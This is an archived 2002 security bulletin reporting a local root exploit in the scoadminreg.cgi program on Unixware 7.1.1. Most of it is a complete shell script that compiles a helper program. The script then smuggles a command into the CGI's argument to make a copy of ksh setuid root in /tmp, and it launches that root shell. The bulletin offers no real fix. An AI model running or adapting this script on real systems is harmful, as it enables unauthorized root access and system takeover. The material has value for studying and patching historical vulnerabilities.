23th Jan 2002 [SBWID-5021]
COMMAND
scoadminreg.cgi local root exploit
SYSTEMS AFFECTED
Unixware 7.1.1
PROBLEM
jGgM posted [http://www.netemperor.com/] :
see exploit below
Exploit :
=========
#!/bin/sh
CC=\"gcc\"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-
bin/admin/scoadminreg.cgi
#
#
#
#
echo
echo \"jGgM root exploit\"
echo \"http://www.netemperor.com/\"
echo
echo \"Mail: jggm@mail.com\"
echo
if [ ! -x $SCOADMIN ]; then
echo \"$SCOADMIN file not found\"
exit 2;
fi
cat >/tmp/jggm.c <<_EOF
main()
{
setuid(0);
setgid(0);
chown(\"/tmp/jGgM_Shell\", 0, 0);
chmod(\"/tmp/jGgM_Shell\", 04755);
}
_EOF
cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c
$SCOADMIN \"-c /tmp/jggm;/tmp/jggm;\"
rm -rf /tmp/jggm /tmp/jggm.c
/tmp/jGgM_Shell
# end of file..
SOLUTION
Upgrade available ??
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
